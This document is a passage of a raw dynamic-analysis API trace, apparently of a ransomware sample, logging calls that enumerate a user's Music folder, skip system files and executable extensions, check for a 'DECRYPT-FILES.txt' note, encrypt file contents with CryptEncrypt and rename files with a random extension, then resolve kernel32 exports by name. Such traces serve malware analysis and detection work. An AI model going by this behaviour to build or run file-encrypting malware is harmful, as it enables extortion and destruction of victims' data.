(lpString="ENUMDATEFORMATSEXW") returned 18 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.913] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.913] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jars3vHzEL-kaB8.mp3") returned 75 [0085.913] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jars3vHzEL-kaB8.mp3.L1cqs8x") returned 83 [0085.913] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jars3vHzEL-kaB8.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\jars3vhzel-kab8.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jars3vHzEL-kaB8.mp3.L1cqs8x" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\jars3vhzel-kab8.mp3.l1cqs8x"), dwFlags=0x0) returned 1 [0085.913] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.914] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.914] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.914] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf43c9e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf43c9e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf43c9e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.914] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.914] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.914] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.914] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.914] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.914] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.914] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.914] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.914] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.914] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.914] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.914] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.914] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.914] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.914] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.914] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0085.914] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.914] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" [0085.915] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jkbimi8.tmp" [0085.915] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.915] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.915] CloseHandle (hObject=0x0) returned 0 [0085.915] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.915] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d3e12f0, ftCreationTime.dwHighDateTime=0x1d4caab, ftLastAccessTime.dwLowDateTime=0x5c87b830, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0x5c87b830, ftLastWriteTime.dwHighDateTime=0x1d4c687, nFileSizeHigh=0x0, nFileSizeLow=0x14dcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="tETpDL N.mp3", cAlternateFileName="TETPDL~1.MP3")) returned 1 [0085.915] lstrcmpiW (lpString1="tETpDL N.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0085.915] lstrcmpiW (lpString1="tETpDL N.mp3", lpString2="autorun.inf") returned 1 [0085.915] lstrcmpiW (lpString1="tETpDL N.mp3", lpString2="boot.ini") returned 1 [0085.915] lstrcmpiW (lpString1="tETpDL N.mp3", lpString2="desktop.ini") returned 1 [0085.915] lstrcmpiW (lpString1="tETpDL N.mp3", lpString2="ntuser.dat") returned 1 [0085.915] lstrcmpiW (lpString1="tETpDL N.mp3", lpString2="iconcache.db") returned 1 [0085.915] lstrcmpiW (lpString1="tETpDL N.mp3", lpString2="bootsect.bak") returned 1 [0085.915] lstrcmpiW (lpString1="tETpDL N.mp3", lpString2="ntuser.dat.log") returned 1 [0085.915] lstrcmpiW (lpString1="tETpDL N.mp3", lpString2="thumbs.db") returned -1 [0085.915] lstrcmpiW (lpString1="tETpDL N.mp3", lpString2="Bootfont.bin") returned 1 [0085.915] lstrlenW (lpString="tETpDL N.mp3") returned 12 [0085.916] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0085.916] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0085.916] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0085.916] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0085.916] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned 56 [0085.916] lstrlenW (lpString="tETpDL N.mp3") returned 12 [0085.916] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" [0085.916] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpString2="tETpDL N.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\tETpDL N.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\tETpDL N.mp3" [0085.916] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\tETpDL N.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\tetpdl n.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.916] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=85452) returned 1 [0085.916] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.916] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.916] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.916] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.917] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.917] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.917] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0085.918] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.919] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.920] CloseHandle (hObject=0x42c) returned 1 [0085.920] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.920] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.921] CloseHandle (hObject=0x0) returned 0 [0085.921] CloseHandle (hObject=0x428) returned 1 [0085.921] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.921] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.921] GetTickCount () returned 0x114defa [0085.921] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.922] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.922] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.922] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.922] lstrlenA (lpString="kernel32.dll") returned 12 [0085.922] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.922] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.922] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.922] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.922] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.922] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.922] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.922] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.922] lstrlenA (lpString="ADDATOMA") returned 8 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.923] lstrlenA (lpString="ADDATOMW") returned 8 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.923] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.923] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.923] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.923] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.923] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.923] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.923] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.923] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.923] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.923] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.923] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.923] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.923] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.923] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.923] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.923] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.923] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.924] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.924] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.924] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.924] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.924] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.924] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.924] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.924] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.924] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.924] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.924] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.924] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.924] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.924] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.924] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.924] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.924] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.924] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.925] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.925] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.925] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.925] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.925] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.925] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.925] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.925] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.925] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.925] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.925] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.925] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.925] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.925] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.925] lstrlenA (lpString="BEEP") returned 4 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.925] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.925] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.925] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.925] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.926] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.926] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.926] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.926] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.926] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.926] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.926] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.926] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.926] lstrlenA (lpString="CANCELIO") returned 8 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.926] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.926] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.926] 